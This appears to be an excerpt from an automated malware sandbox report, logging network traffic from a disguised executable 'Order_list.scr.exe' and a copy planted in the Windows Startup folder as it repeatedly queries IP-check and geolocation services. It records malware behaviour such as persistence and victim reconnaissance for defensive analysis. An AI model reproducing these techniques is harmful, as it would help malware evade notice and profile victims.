                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 13, 2025 10:12:05.345182896 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 13, 2025 10:12:05.559529066 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:05 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 13, 2025 10:12:06.264095068 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 13, 2025 10:12:06.484824896 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:06 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449736132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:07.134248018 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 13, 2025 10:12:07.930176020 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:07 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449738132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:08.559062958 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:09.252350092 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:09 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449741132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:09.868433952 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:10.578663111 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:10 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449744132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:11.214314938 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:11.888705015 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449746132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:12.514905930 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:13.194729090 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:13 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449748132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:13.824549913 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:14.512423038 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:14 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449750132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:18.308895111 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:19.001573086 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:18 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 13, 2025 10:12:19.010643959 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 13, 2025 10:12:19.230863094 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:19 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 13, 2025 10:12:20.059282064 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 13, 2025 10:12:20.270972967 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:20 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449756132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:20.918590069 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 13, 2025 10:12:21.619364977 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:21 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449760132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:23.181508064 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:24.707535982 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:23 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 13, 2025 10:12:24.707962036 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:23 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 13, 2025 10:12:24.708024979 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:23 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449763132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:25.304470062 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:25.977600098 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:25 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449765132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:26.706052065 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:27.406127930 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:27 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449767132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:28.008965969 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:28.707839012 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:28 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.449769132.226.247.73806256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:29.327056885 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:30.023576975 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:29 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449733104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:06 UTC871INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:06 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074315
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYFr%2BMZ8zBiFk%2Fj7q2xHrWgf%2F%2BXWfJ2GOwZPyYcX%2FdpPQ%2FHD%2BIzqN6SHFqeEkAbQUhtxNv%2F7zfCwqzj1QPY%2Bp5%2B%2BpSKE8EcjsGvdjijhRnktC6jMjZRESlcBOb6B3KwSYH8lc12B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9014433ebcf7c358-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1638&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1762220&cwnd=155&unsent_bytes=0&cid=cac4b7d62568a81d&ts=186&x=0"
